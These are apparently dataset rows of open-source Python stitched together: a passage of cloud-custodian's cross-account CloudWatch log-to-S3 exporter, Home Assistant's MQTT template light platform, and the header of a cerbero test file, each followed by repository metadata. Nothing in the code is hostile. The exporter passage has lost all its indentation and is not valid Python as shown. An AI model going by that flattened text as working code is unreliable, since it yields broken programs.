"""c7n cloudwatch log group exporter"""
@cli.command()
@click.option('--config', type=click.Path())
def validate(config):
"""validate config file"""
with open(config) as fh:
content = fh.read()
try:
data = yaml.safe_load(content)
except Exception:
log.error("config file: %s is not valid yaml", config)
raise
try:
jsonschema.validate(data, CONFIG_SCHEMA)
except Exception:
log.error("config file: %s is not valid", config)
raise
log.info("config file valid, accounts:%d", len(data['accounts']))
return data
@cli.command()
@click.option('--config', type=click.Path(), required=True)
@click.option('--start', required=True)
@click.option('--end')
@click.option('-a', '--accounts', multiple=True)
@click.option('--debug', is_flag=True, default=False)
def run(config, start, end, accounts, debug):
"""run export across accounts and log groups specified in config."""
config = validate.callback(config)
destination = config.get('destination')
start = start and parse(start) or start
end = end and parse(end) or datetime.now()
executor = debug and MainThreadExecutor or ThreadPoolExecutor
with executor(max_workers=32) as w:
futures = {}
for account in config.get('accounts', ()):
if accounts and account['name'] not in accounts:
continue
futures[
w.submit(process_account, account, start, end, destination)] = account
for f in as_completed(futures):
account = futures[f]
if f.exception():
log.error("Error on account %s err: %s",
account['name'], f.exception())
log.info("Completed %s", account['name'])
def lambdafan(func):
"""simple decorator that will auto fan out async style in lambda.
outside of lambda, this will invoke synchrously.
"""
if 'AWS_LAMBDA_FUNCTION_NAME' not in os.environ:
return func
@functools.wraps(func)
def scaleout(*args, **kw):
client = boto3.client('lambda')
client.invoke(
FunctionName=os.environ['AWS_LAMBDA_FUNCTION_NAME'],
InvocationType='Event',
Payload=dumps({
'event': 'fanout',
'function': func.__name__,
'args': args,
'kwargs': kw}),
Qualifier=os.environ['AWS_LAMBDA_FUNCTION_VERSION'])
return scaleout
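# Note: the fan-out payload above presumes the deployed Lambda's entry
# point recognises {'event': 'fanout', ...} and re-dispatches to the named
# function; a minimal handler sketch (assumed, not part of this file):
#
#     def handler(event, context):
#         if event.get('event') == 'fanout':
#             globals()[event['function']](*event['args'], **event['kwargs'])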
@lambdafan
def process_account(account, start, end, destination, incremental=True):
session = get_session(account['role'])
client = session.client('logs')
paginator = client.get_paginator('describe_log_groups')
all_groups = []
for p in paginator.paginate():
all_groups.extend([g for g in p.get('logGroups', ())])
group_count = len(all_groups)
groups = filter_creation_date(
filter_group_names(all_groups, account['groups']),
start, end)
if incremental:
groups = filter_last_write(client, groups, start)
account_id = session.client('sts').get_caller_identity()['Account']
prefix = destination.get('prefix', '').rstrip('/') + '/%s' % account_id
log.info("account:%s matched %d groups of %d",
account.get('name', account_id), len(groups), group_count)
if not groups:
log.warning("account:%s no groups matched, all groups \n %s",
account.get('name', account_id), "\n ".join(
[g['logGroupName'] for g in all_groups]))
t = time.time()
for g in groups:
export.callback(
g,
destination['bucket'], prefix,
g['exportStart'], end, account['role'],
name=account['name'])
log.info("account:%s exported %d log groups in time:%0.2f",
account.get('name') or account_id,
len(groups), time.time() - t)
def get_session(role, session_name="c7n-log-exporter", session=None):
if role == 'self':
session = boto3.Session()
elif isinstance(role, basestring):
session = assumed_session(role, session_name)
elif isinstance(role, list):
session = None
for r in role:
session = assumed_session(r, session_name, session=session)
else:
session = boto3.Session()
return session
def filter_group_names(groups, patterns):
"""Filter log groups by shell patterns.
"""
group_names = [g['logGroupName'] for g in groups]
matched = set()
for p in patterns:
matched.update(fnmatch.filter(group_names, p))
return [g for g in groups if g['logGroupName'] in matched]
def filter_creation_date(groups, start, end):
"""Filter log groups by their creation date.
Also sets group specific value for start to the minimum
of creation date or start.
"""
results = []
for g in groups:
created = datetime.fromtimestamp(g['creationTime'] / 1000.0)
if created > end:
continue
if created > start:
g['exportStart'] = created
else:
g['exportStart'] = start
results.append(g)
return results
def filter_last_write(client, groups, start):
"""Filter log groups where the last write was before the start date.
"""
retry = get_retry(('ThrottlingException',))
def process_group(group_set):
matched = []
for g in group_set:
streams = retry(
client.describe_log_streams,
logGroupName=g['logGroupName'],
orderBy='LastEventTime',
limit=1, descending=True)
if not streams.get('logStreams'):
continue
stream = streams['logStreams'][0]
if stream['storedBytes'] == 0 and datetime.fromtimestamp(
stream['creationTime'] / 1000) > start:
matched.append(g)
elif 'lastIngestionTime' in stream and datetime.fromtimestamp(
stream['lastIngestionTime'] / 1000) > start:
matched.append(g)
return matched
results = []
with ThreadPoolExecutor(max_workers=3) as w:
futures = {}
for group_set in chunks(groups, 10):
futures[w.submit(process_group, group_set)] = group_set
for f in as_completed(futures):
if f.exception():
log.error(
"Error processing groupset:%s error:%s",
group_set,
f.exception())
results.extend(f.result())
return results
def filter_extant_exports(client, bucket, prefix, days, start, end=None):
"""Filter days where the bucket already has extant export keys.
"""
end = end or datetime.now()
# days = [start + timedelta(i) for i in range((end-start).days)]
try:
tag_set = client.get_object_tagging(Bucket=bucket, Key=prefix).get('TagSet', [])
except ClientError as e:
if e.response['Error']['Code'] != 'NoSuchKey':
raise
tag_set = []
tags = {t['Key']: t['Value'] for t in tag_set}
if 'LastExport' not in tags:
return sorted(days)
last_export = parse(tags['LastExport'])
if last_export.tzinfo is None:
last_export = last_export.replace(tzinfo=tzutc())
return [d for d in sorted(days) if d > last_export]
@cli.command()
@click.option('--config', type=click.Path(), required=True)
@click.option('-a', '--accounts', multiple=True)
def access(config, accounts=()):
"""Check iam permissions for log export access in each account"""
config = validate.callback(config)
accounts_report = []
def check_access(account):
accounts_report.append(account)
session = get_session(account['role'])
identity = session.client('sts').get_caller_identity()
account['account_id'] = identity['Account']
account.pop('groups')
account.pop('role')
client = session.client('iam')
policy_arn = identity['Arn']
if policy_arn.count('/') > 1:
policy_arn = policy_arn.rsplit('/', 1)[0]
if ':sts:' in policy_arn:
policy_arn = policy_arn.replace(':sts', ':iam')
if ':assumed-role' in policy_arn:
policy_arn = policy_arn.replace(':assumed-role', ':role')
evaluation = client.simulate_principal_policy(
PolicySourceArn=policy_arn,
ActionNames=['logs:CreateExportTask'])['EvaluationResults']
account['access'] = evaluation[0]['EvalDecision']
with ThreadPoolExecutor(max_workers=16) as w:
futures = {}
for account in config.get('accounts', ()):
if accounts and account['name'] not in accounts:
continue
futures[w.submit(check_access, account)] = None
for f in as_completed(futures):
pass
accounts_report.sort(key=operator.itemgetter('access'), reverse=True)
print(tabulate(accounts_report, headers='keys'))
def GetHumanSize(size, precision=2):
# interesting discussion on 1024 vs 1000 as base
# https://en.wikipedia.org/wiki/Binary_prefix
suffixes = ['B','KB','MB','GB','TB', 'PB']
suffixIndex = 0
while size > 1024:
suffixIndex += 1
size = size / 1024.0
return "%.*f %s" % (precision, size, suffixes[suffixIndex])
@cli.command()
@click.option('--config', type=click.Path(), required=True)
@click.option('-a', '--accounts', multiple=True)
@click.option('--day', required=True, help="calculate sizes for this day")
@click.option('--group', required=True)
@click.option('--human/--no-human', default=True)
def size(config, accounts=(), day=None, group=None, human=True):
"""size of exported records for a given day."""
config = validate.callback(config)
destination = config.get('destination')
client = boto3.Session().client('s3')
day = parse(day)
def export_size(client, account):
paginator = client.get_paginator('list_objects_v2')
count = 0
size = 0
session = get_session(account['role'])
account_id = session.client('sts').get_caller_identity()['Account']
prefix = destination.get('prefix', '').rstrip('/') + '/%s' % account_id
prefix = "%s/%s/%s" % (prefix, group, day.strftime("%Y/%m/%d"))
account['account_id'] = account_id
for page in paginator.paginate(
Bucket=destination['bucket'],
Prefix=prefix):
for k in page.get('Contents', ()):
size += k['Size']
count += 1
return (count, size)
total_size = 0
accounts_report = []
logging.getLogger('botocore').setLevel(logging.ERROR)
with ThreadPoolExecutor(max_workers=16) as w:
futures = {}
for account in config.get('accounts'):
if accounts and account['name'] not in accounts:
continue
futures[w.submit(export_size, client, account)] = account
for f in as_completed(futures):
account = futures[f]
count, size = f.result()
account.pop('role')
account.pop('groups')
total_size += size
if human:
account['size'] = GetHumanSize(size)
else:
account['size'] = size
account['count'] = count
accounts_report.append(account)
accounts_report.sort(key=operator.itemgetter('count'), reverse=True)
print(tabulate(accounts_report, headers='keys'))
log.info("total size:%s", GetHumanSize(total_size))
@cli.command()
@click.option('--config', type=click.Path(), required=True)
@click.option('-g', '--group', required=True)
@click.option('-a', '--accounts', multiple=True)
@click.option('--dryrun/--no-dryrun', is_flag=True, default=False)
def sync(config, group, accounts=(), dryrun=False):
"""sync last recorded export to actual
Use --dryrun to check status.
"""
config = validate.callback(config)
destination = config.get('destination')
client = boto3.Session().client('s3')
for account in config.get('accounts', ()):
if accounts and account['name'] not in accounts:
continue
session = get_session(account['role'])
account_id = session.client('sts').get_caller_identity()['Account']
prefix = destination.get('prefix', '').rstrip('/') + '/%s' % account_id
prefix = "%s/%s" % (prefix, group)
exports = get_exports(client, destination['bucket'], prefix + "/")
role = account.pop('role')
if isinstance(role, basestring):
account['account_id'] = role.split(':')[4]
else:
account['account_id'] = role[-1].split(':')[4]
account.pop('groups')
if exports:
last_export = exports.pop()
account['export'] = last_export
else:
account['export'] = 'missing'
last_export = None
try:
tag_set = client.get_object_tagging(
Bucket=destination['bucket'], Key=prefix).get('TagSet', [])
        except ClientError:
tag_set = []
tags = {t['Key']: t['Value'] for t in tag_set}
tagged_last_export = None
if 'LastExport' in tags:
le = parse(tags['LastExport'])
tagged_last_export = (le.year, le.month, le.day)
account['sync'] = tagged_last_export
else:
account['sync'] = account['export'] != 'missing' and 'sync' or 'missing'
if last_export is None:
continue
if tagged_last_export == last_export or account['export'] == 'missing':
continue
if dryrun:
continue
client.put_object(
Bucket=destination['bucket'],
Key=prefix,
Body=json.dumps({}),
ACL="bucket-owner-full-control",
ServerSideEncryption="AES256")
export_time = datetime.now().replace(tzinfo=tzlocal()).astimezone(tzutc())
export_time = export_time.replace(
year=last_export[0], month=last_export[1], day=last_export[2],
minute=0, second=0, microsecond=0, hour=0)
client.put_object_tagging(
Bucket=destination['bucket'], Key=prefix,
Tagging={
'TagSet': [{
'Key': 'LastExport',
'Value': export_time.isoformat()}]})
accounts_report = []
for a in config.get('accounts'):
if accounts and a['name'] not in accounts:
continue
if isinstance(a['sync'], tuple):
a['sync'] = "%s/%s/%s" % (a['sync'])
if isinstance(a['export'], tuple):
a['export'] = "%s/%s/%s" % (a['export'])
accounts_report.append(a)
accounts_report.sort(key=operator.itemgetter('export'), reverse=True)
print(tabulate(accounts_report, headers='keys'))
@cli.command()
@click.option('--config', type=click.Path(), required=True)
@click.option('-g', '--group', required=True)
@click.option('-a', '--accounts', multiple=True)
def status(config, group, accounts=()):
"""report current export state status"""
config = validate.callback(config)
destination = config.get('destination')
client = boto3.Session().client('s3')
for account in config.get('accounts', ()):
if accounts and account['name'] not in accounts:
continue
session = get_session(account['role'])
account_id = session.client('sts').get_caller_identity()['Account']
prefix = destination.get('prefix', '').rstrip('/') + '/%s' % account_id
prefix = "%s/flow-log" % prefix
role = account.pop('role')
if isinstance(role, basestring):
account['account_id'] = role.split(':')[4]
else:
account['account_id'] = role[-1].split(':')[4]
account.pop('groups')
try:
tag_set = client.get_object_tagging(
Bucket=destination['bucket'], Key=prefix).get('TagSet', [])
        except ClientError:
account['export'] = 'missing'
continue
tags = {t['Key']: t['Value'] for t in tag_set}
if 'LastExport' not in tags:
account['export'] = 'empty'
else:
last_export = parse(tags['LastExport'])
account['export'] = last_export.strftime('%Y/%m/%d')
    accounts = [a for a in config.get('accounts') if not accounts or a['name'] in accounts]
accounts.sort(key=operator.itemgetter('export'), reverse=True)
print(tabulate(accounts, headers='keys'))
def get_exports(client, bucket, prefix, latest=True):
"""Find exports for a given account
"""
keys = client.list_objects_v2(
Bucket=bucket, Prefix=prefix, Delimiter='/').get('CommonPrefixes', [])
found = []
years = []
for y in keys:
part = y['Prefix'].rsplit('/', 2)[-2]
if not part.isdigit():
continue
year = int(part)
years.append(year)
if not years:
return []
years.sort(reverse=True)
if latest:
years = [years[0]]
for y in years:
keys = client.list_objects_v2(
Bucket=bucket, Prefix="%s/%d/" % (prefix.strip('/'), y),
Delimiter='/').get('CommonPrefixes', [])
months = []
for m in keys:
part = m['Prefix'].rsplit('/', 2)[-2]
if not part.isdigit():
continue
month = int(part)
date_key = (y, month)
months.append(month)
months.sort(reverse=True)
if not months:
continue
if latest:
months = [months[0]]
for m in months:
keys = client.list_objects_v2(
Bucket=bucket, Prefix="%s/%d/%s/" % (
prefix.strip('/'), y, ('%d' % m).rjust(2, '0')),
Delimiter='/').get('CommonPrefixes', [])
for d in keys:
part = d['Prefix'].rsplit('/', 2)[-2]
if not part.isdigit():
continue
day = int(part)
date_key = (y, m, day)
found.append(date_key)
found.sort(reverse=True)
if latest:
found = [found[0]]
return found
@cli.command()
@click.option('--group', required=True)
@click.option('--bucket', required=True)
@click.option('--prefix')
@click.option('--start', required=True, help="export logs from this date")
@click.option('--end')
@click.option('--role', help="sts role to assume for log group access")
@click.option('--poll-period', type=float, default=300)
# @click.option('--bucket-role', help="role to scan destination bucket")
# @click.option('--stream-prefix)
@lambdafan
def export(group, bucket, prefix, start, end, role, poll_period=120, session=None, name=""):
"""export a given log group to s3"""
start = start and isinstance(start, basestring) and parse(start) or start
    end = (end and isinstance(end, basestring) and
           parse(end) or end or datetime.now())
start = start.replace(tzinfo=tzlocal()).astimezone(tzutc())
end = end.replace(tzinfo=tzlocal()).astimezone(tzutc())
if session is None:
session = get_session(role)
client = session.client('logs')
for _group in client.describe_log_groups()['logGroups']:
if _group['logGroupName'] == group:
break
else:
raise ValueError('Log group not found.')
group = _group
if prefix:
prefix = "%s/%s" % (prefix.rstrip('/'), group['logGroupName'].strip('/'))
else:
prefix = group['logGroupName']
named_group = "%s:%s" % (name, group['logGroupName'])
log.info(
"Log exporting group:%s start:%s end:%s bucket:%s prefix:%s size:%s",
named_group,
start.strftime('%Y/%m/%d'),
end.strftime('%Y/%m/%d'),
bucket,
prefix,
group['storedBytes'])
t = time.time()
days = [(start + timedelta(i)).replace(
minute=0, hour=0, second=0, microsecond=0)
for i in range((end - start).days)]
day_count = len(days)
s3 = boto3.Session().client('s3')
days = filter_extant_exports(s3, bucket, prefix, days, start, end)
log.info("Group:%s filtering s3 extant keys from %d to %d start:%s end:%s",
named_group, day_count, len(days),
days[0] if days else '', days[-1] if days else '')
t = time.time()
retry = get_retry(('SlowDown',))
for idx, d in enumerate(days):
date = d.replace(minute=0, microsecond=0, hour=0)
export_prefix = "%s%s" % (prefix, date.strftime("/%Y/%m/%d"))
params = {
'taskName': "%s-%s" % ("c7n-log-exporter",
date.strftime("%Y-%m-%d")),
'logGroupName': group['logGroupName'],
'fromTime': int(time.mktime(
date.replace(
minute=0, microsecond=0, hour=0).timetuple()) * 1000),
'to': int(time.mktime(
date.replace(
minute=59, hour=23, microsecond=0).timetuple()) * 1000),
'destination': bucket,
'destinationPrefix': export_prefix
}
# if stream_prefix:
# params['logStreamPrefix'] = stream_prefix
try:
s3.head_object(Bucket=bucket, Key=prefix)
except ClientError as e:
if e.response['Error']['Code'] != '404': # Not Found
raise
s3.put_object(
Bucket=bucket,
Key=prefix,
Body=json.dumps({}),
ACL="bucket-owner-full-control",
ServerSideEncryption="AES256")
t = time.time()
counter = 0
while True:
counter += 1
try:
result = client.create_export_task(**params)
except ClientError as e:
if e.response['Error']['Code'] == 'LimitExceededException':
time.sleep(poll_period)
# log every 30m of export waiting
if counter % 6 == 0:
log.debug(
"group:%s day:%s waiting for %0.2f minutes",
named_group, d.strftime('%Y-%m-%d'),
(counter * poll_period) / 60.0)
continue
raise
retry(
s3.put_object_tagging,
Bucket=bucket, Key=prefix,
Tagging={
'TagSet': [{
'Key': 'LastExport',
'Value': d.isoformat()}]})
break
log.info(
"Log export time:%0.2f group:%s day:%s bucket:%s prefix:%s task:%s",
time.time() - t,
named_group,
d.strftime("%Y-%m-%d"),
bucket,
params['destinationPrefix'],
result['taskId'])
log.info(
("Exported log group:%s time:%0.2f days:%d start:%s"
" end:%s bucket:%s prefix:%s"),
named_group,
time.time() - t,
len(days),
start.strftime('%Y/%m/%d'),
end.strftime('%Y/%m/%d'),
bucket,
prefix)
if __name__ == '__main__':
cli()
|
sixfeetup/cloud-custodian
|
tools/c7n_logexporter/c7n_logexporter/exporter.py
|
Python
|
apache-2.0
| 26,318 | 0.00057 |
"""
Support for MQTT Template lights.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/light.mqtt_template/
"""
import logging
import voluptuous as vol
from homeassistant.core import callback
from homeassistant.components import mqtt
from homeassistant.components.light import (
ATTR_BRIGHTNESS, ATTR_COLOR_TEMP, ATTR_EFFECT, ATTR_FLASH,
ATTR_HS_COLOR, ATTR_TRANSITION, ATTR_WHITE_VALUE, Light,
SUPPORT_BRIGHTNESS, SUPPORT_COLOR_TEMP, SUPPORT_EFFECT, SUPPORT_FLASH,
SUPPORT_COLOR, SUPPORT_TRANSITION, SUPPORT_WHITE_VALUE)
from homeassistant.const import (
CONF_DEVICE, CONF_NAME, CONF_OPTIMISTIC, STATE_ON, STATE_OFF)
from homeassistant.components.mqtt import (
CONF_AVAILABILITY_TOPIC, CONF_STATE_TOPIC, CONF_COMMAND_TOPIC,
CONF_PAYLOAD_AVAILABLE, CONF_PAYLOAD_NOT_AVAILABLE, CONF_QOS, CONF_RETAIN,
MqttAvailability, MqttDiscoveryUpdate, MqttEntityDeviceInfo, subscription)
import homeassistant.helpers.config_validation as cv
import homeassistant.util.color as color_util
from homeassistant.helpers.restore_state import RestoreEntity
_LOGGER = logging.getLogger(__name__)
DOMAIN = 'mqtt_template'
DEPENDENCIES = ['mqtt']
DEFAULT_NAME = 'MQTT Template Light'
DEFAULT_OPTIMISTIC = False
CONF_BLUE_TEMPLATE = 'blue_template'
CONF_BRIGHTNESS_TEMPLATE = 'brightness_template'
CONF_COLOR_TEMP_TEMPLATE = 'color_temp_template'
CONF_COMMAND_OFF_TEMPLATE = 'command_off_template'
CONF_COMMAND_ON_TEMPLATE = 'command_on_template'
CONF_EFFECT_LIST = 'effect_list'
CONF_EFFECT_TEMPLATE = 'effect_template'
CONF_GREEN_TEMPLATE = 'green_template'
CONF_RED_TEMPLATE = 'red_template'
CONF_STATE_TEMPLATE = 'state_template'
CONF_WHITE_VALUE_TEMPLATE = 'white_value_template'
CONF_UNIQUE_ID = 'unique_id'
PLATFORM_SCHEMA_TEMPLATE = mqtt.MQTT_RW_PLATFORM_SCHEMA.extend({
vol.Optional(CONF_BLUE_TEMPLATE): cv.template,
vol.Optional(CONF_BRIGHTNESS_TEMPLATE): cv.template,
vol.Optional(CONF_COLOR_TEMP_TEMPLATE): cv.template,
vol.Optional(CONF_EFFECT_LIST): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_EFFECT_TEMPLATE): cv.template,
vol.Optional(CONF_GREEN_TEMPLATE): cv.template,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_OPTIMISTIC, default=DEFAULT_OPTIMISTIC): cv.boolean,
vol.Optional(CONF_RED_TEMPLATE): cv.template,
vol.Optional(CONF_RETAIN, default=mqtt.DEFAULT_RETAIN): cv.boolean,
vol.Optional(CONF_STATE_TEMPLATE): cv.template,
vol.Optional(CONF_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_WHITE_VALUE_TEMPLATE): cv.template,
vol.Required(CONF_COMMAND_OFF_TEMPLATE): cv.template,
vol.Required(CONF_COMMAND_ON_TEMPLATE): cv.template,
vol.Required(CONF_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_QOS, default=mqtt.DEFAULT_QOS):
vol.All(vol.Coerce(int), vol.In([0, 1, 2])),
vol.Optional(CONF_UNIQUE_ID): cv.string,
vol.Optional(CONF_DEVICE): mqtt.MQTT_ENTITY_DEVICE_INFO_SCHEMA,
}).extend(mqtt.MQTT_AVAILABILITY_SCHEMA.schema)
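# For reference, a configuration.yaml entry matching this schema might look
# like the following (topics and templates are illustrative placeholders):
#
#     light:
#       - platform: mqtt_template
#         name: "Office light"
#         command_topic: "office/light/set"
#         state_topic: "office/light/state"
#         command_on_template: "on,{{ brightness|d }}"
#         command_off_template: "off"
#         state_template: "{{ value.split(',')[0] }}"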
async def async_setup_entity_template(hass, config, async_add_entities,
discovery_hash):
"""Set up a MQTT Template light."""
async_add_entities([MqttTemplate(config, discovery_hash)])
# pylint: disable=too-many-ancestors
class MqttTemplate(MqttAvailability, MqttDiscoveryUpdate, MqttEntityDeviceInfo,
Light, RestoreEntity):
"""Representation of a MQTT Template light."""
def __init__(self, config, discovery_hash):
"""Initialize a MQTT Template light."""
self._state = False
self._sub_state = None
self._topics = None
self._templates = None
self._optimistic = False
# features
self._brightness = None
self._color_temp = None
self._white_value = None
self._hs = None
self._effect = None
self._unique_id = config.get(CONF_UNIQUE_ID)
# Load config
self._setup_from_config(config)
availability_topic = config.get(CONF_AVAILABILITY_TOPIC)
payload_available = config.get(CONF_PAYLOAD_AVAILABLE)
payload_not_available = config.get(CONF_PAYLOAD_NOT_AVAILABLE)
qos = config.get(CONF_QOS)
device_config = config.get(CONF_DEVICE)
MqttAvailability.__init__(self, availability_topic, qos,
payload_available, payload_not_available)
MqttDiscoveryUpdate.__init__(self, discovery_hash,
self.discovery_update)
MqttEntityDeviceInfo.__init__(self, device_config)
async def async_added_to_hass(self):
"""Subscribe to MQTT events."""
await super().async_added_to_hass()
await self._subscribe_topics()
async def discovery_update(self, discovery_payload):
"""Handle updated discovery message."""
config = PLATFORM_SCHEMA_TEMPLATE(discovery_payload)
self._setup_from_config(config)
await self.availability_discovery_update(config)
await self._subscribe_topics()
self.async_schedule_update_ha_state()
def _setup_from_config(self, config):
"""(Re)Setup the entity."""
self._config = config
self._topics = {
key: config.get(key) for key in (
CONF_STATE_TOPIC,
CONF_COMMAND_TOPIC
)
}
self._templates = {
key: config.get(key) for key in (
CONF_BLUE_TEMPLATE,
CONF_BRIGHTNESS_TEMPLATE,
CONF_COLOR_TEMP_TEMPLATE,
CONF_COMMAND_OFF_TEMPLATE,
CONF_COMMAND_ON_TEMPLATE,
CONF_EFFECT_TEMPLATE,
CONF_GREEN_TEMPLATE,
CONF_RED_TEMPLATE,
CONF_STATE_TEMPLATE,
CONF_WHITE_VALUE_TEMPLATE,
)
}
optimistic = config.get(CONF_OPTIMISTIC)
self._optimistic = optimistic \
or self._topics[CONF_STATE_TOPIC] is None \
or self._templates[CONF_STATE_TEMPLATE] is None
# features
if self._templates[CONF_BRIGHTNESS_TEMPLATE] is not None:
self._brightness = 255
else:
self._brightness = None
if self._templates[CONF_COLOR_TEMP_TEMPLATE] is not None:
self._color_temp = 255
else:
self._color_temp = None
if self._templates[CONF_WHITE_VALUE_TEMPLATE] is not None:
self._white_value = 255
else:
self._white_value = None
if (self._templates[CONF_RED_TEMPLATE] is not None and
self._templates[CONF_GREEN_TEMPLATE] is not None and
self._templates[CONF_BLUE_TEMPLATE] is not None):
self._hs = [0, 0]
else:
self._hs = None
self._effect = None
async def _subscribe_topics(self):
"""(Re)Subscribe to topics."""
for tpl in self._templates.values():
if tpl is not None:
tpl.hass = self.hass
last_state = await self.async_get_last_state()
@callback
def state_received(topic, payload, qos):
"""Handle new MQTT messages."""
state = self._templates[CONF_STATE_TEMPLATE].\
async_render_with_possible_json_value(payload)
if state == STATE_ON:
self._state = True
elif state == STATE_OFF:
self._state = False
else:
_LOGGER.warning("Invalid state value received")
if self._brightness is not None:
try:
self._brightness = int(
self._templates[CONF_BRIGHTNESS_TEMPLATE].
async_render_with_possible_json_value(payload)
)
except ValueError:
_LOGGER.warning("Invalid brightness value received")
if self._color_temp is not None:
try:
self._color_temp = int(
self._templates[CONF_COLOR_TEMP_TEMPLATE].
async_render_with_possible_json_value(payload)
)
except ValueError:
_LOGGER.warning("Invalid color temperature value received")
if self._hs is not None:
try:
red = int(
self._templates[CONF_RED_TEMPLATE].
async_render_with_possible_json_value(payload))
green = int(
self._templates[CONF_GREEN_TEMPLATE].
async_render_with_possible_json_value(payload))
blue = int(
self._templates[CONF_BLUE_TEMPLATE].
async_render_with_possible_json_value(payload))
self._hs = color_util.color_RGB_to_hs(red, green, blue)
except ValueError:
_LOGGER.warning("Invalid color value received")
if self._white_value is not None:
try:
self._white_value = int(
self._templates[CONF_WHITE_VALUE_TEMPLATE].
async_render_with_possible_json_value(payload)
)
except ValueError:
_LOGGER.warning('Invalid white value received')
if self._templates[CONF_EFFECT_TEMPLATE] is not None:
effect = self._templates[CONF_EFFECT_TEMPLATE].\
async_render_with_possible_json_value(payload)
if effect in self._config.get(CONF_EFFECT_LIST):
self._effect = effect
else:
_LOGGER.warning("Unsupported effect value received")
self.async_schedule_update_ha_state()
if self._topics[CONF_STATE_TOPIC] is not None:
self._sub_state = await subscription.async_subscribe_topics(
self.hass, self._sub_state,
{'state_topic': {'topic': self._topics[CONF_STATE_TOPIC],
'msg_callback': state_received,
'qos': self._config.get(CONF_QOS)}})
if self._optimistic and last_state:
self._state = last_state.state == STATE_ON
if last_state.attributes.get(ATTR_BRIGHTNESS):
self._brightness = last_state.attributes.get(ATTR_BRIGHTNESS)
if last_state.attributes.get(ATTR_HS_COLOR):
self._hs = last_state.attributes.get(ATTR_HS_COLOR)
if last_state.attributes.get(ATTR_COLOR_TEMP):
self._color_temp = last_state.attributes.get(ATTR_COLOR_TEMP)
if last_state.attributes.get(ATTR_EFFECT):
self._effect = last_state.attributes.get(ATTR_EFFECT)
if last_state.attributes.get(ATTR_WHITE_VALUE):
self._white_value = last_state.attributes.get(ATTR_WHITE_VALUE)
async def async_will_remove_from_hass(self):
"""Unsubscribe when removed."""
self._sub_state = await subscription.async_unsubscribe_topics(
self.hass, self._sub_state)
await MqttAvailability.async_will_remove_from_hass(self)
@property
def brightness(self):
"""Return the brightness of this light between 0..255."""
return self._brightness
@property
def color_temp(self):
"""Return the color temperature in mired."""
return self._color_temp
@property
def hs_color(self):
"""Return the hs color value [int, int]."""
return self._hs
@property
def white_value(self):
"""Return the white property."""
return self._white_value
@property
def should_poll(self):
"""Return True if entity has to be polled for state.
False if entity pushes its state to HA.
"""
return False
@property
def name(self):
"""Return the name of the entity."""
return self._config.get(CONF_NAME)
@property
def unique_id(self):
"""Return a unique ID."""
return self._unique_id
@property
def is_on(self):
"""Return True if entity is on."""
return self._state
@property
def assumed_state(self):
"""Return True if unable to access real state of the entity."""
return self._optimistic
@property
def effect_list(self):
"""Return the list of supported effects."""
return self._config.get(CONF_EFFECT_LIST)
@property
def effect(self):
"""Return the current effect."""
return self._effect
async def async_turn_on(self, **kwargs):
"""Turn the entity on.
This method is a coroutine.
"""
values = {'state': True}
if self._optimistic:
self._state = True
if ATTR_BRIGHTNESS in kwargs:
values['brightness'] = int(kwargs[ATTR_BRIGHTNESS])
if self._optimistic:
self._brightness = kwargs[ATTR_BRIGHTNESS]
if ATTR_COLOR_TEMP in kwargs:
values['color_temp'] = int(kwargs[ATTR_COLOR_TEMP])
if self._optimistic:
self._color_temp = kwargs[ATTR_COLOR_TEMP]
if ATTR_HS_COLOR in kwargs:
hs_color = kwargs[ATTR_HS_COLOR]
# If there's a brightness topic set, we don't want to scale the RGB
# values given using the brightness.
if self._templates[CONF_BRIGHTNESS_TEMPLATE] is not None:
brightness = 255
else:
brightness = kwargs.get(
ATTR_BRIGHTNESS, self._brightness if self._brightness else
255)
rgb = color_util.color_hsv_to_RGB(
hs_color[0], hs_color[1], brightness / 255 * 100)
values['red'] = rgb[0]
values['green'] = rgb[1]
values['blue'] = rgb[2]
if self._optimistic:
self._hs = kwargs[ATTR_HS_COLOR]
if ATTR_WHITE_VALUE in kwargs:
values['white_value'] = int(kwargs[ATTR_WHITE_VALUE])
if self._optimistic:
self._white_value = kwargs[ATTR_WHITE_VALUE]
if ATTR_EFFECT in kwargs:
values['effect'] = kwargs.get(ATTR_EFFECT)
if ATTR_FLASH in kwargs:
values['flash'] = kwargs.get(ATTR_FLASH)
if ATTR_TRANSITION in kwargs:
values['transition'] = int(kwargs[ATTR_TRANSITION])
mqtt.async_publish(
self.hass, self._topics[CONF_COMMAND_TOPIC],
self._templates[CONF_COMMAND_ON_TEMPLATE].async_render(**values),
self._config.get(CONF_QOS), self._config.get(CONF_RETAIN)
)
if self._optimistic:
self.async_schedule_update_ha_state()
async def async_turn_off(self, **kwargs):
"""Turn the entity off.
This method is a coroutine.
"""
values = {'state': False}
if self._optimistic:
self._state = False
if ATTR_TRANSITION in kwargs:
values['transition'] = int(kwargs[ATTR_TRANSITION])
mqtt.async_publish(
self.hass, self._topics[CONF_COMMAND_TOPIC],
self._templates[CONF_COMMAND_OFF_TEMPLATE].async_render(**values),
self._config.get(CONF_QOS), self._config.get(CONF_RETAIN)
)
if self._optimistic:
self.async_schedule_update_ha_state()
@property
def supported_features(self):
"""Flag supported features."""
features = (SUPPORT_FLASH | SUPPORT_TRANSITION)
if self._brightness is not None:
features = features | SUPPORT_BRIGHTNESS
if self._hs is not None:
features = features | SUPPORT_COLOR
if self._config.get(CONF_EFFECT_LIST) is not None:
features = features | SUPPORT_EFFECT
if self._color_temp is not None:
features = features | SUPPORT_COLOR_TEMP
if self._white_value is not None:
features = features | SUPPORT_WHITE_VALUE
return features
|
tinloaf/home-assistant
|
homeassistant/components/light/mqtt/schema_template.py
|
Python
|
apache-2.0
| 16,276 | 0 |
# cerbero - a multi-platform build system for Open Source software
# Copyright (C) 2012 Andoni Morales Alastruey <ylatuya@gmail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Library General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
import unittest
import StringIO
from cerbero import hacks
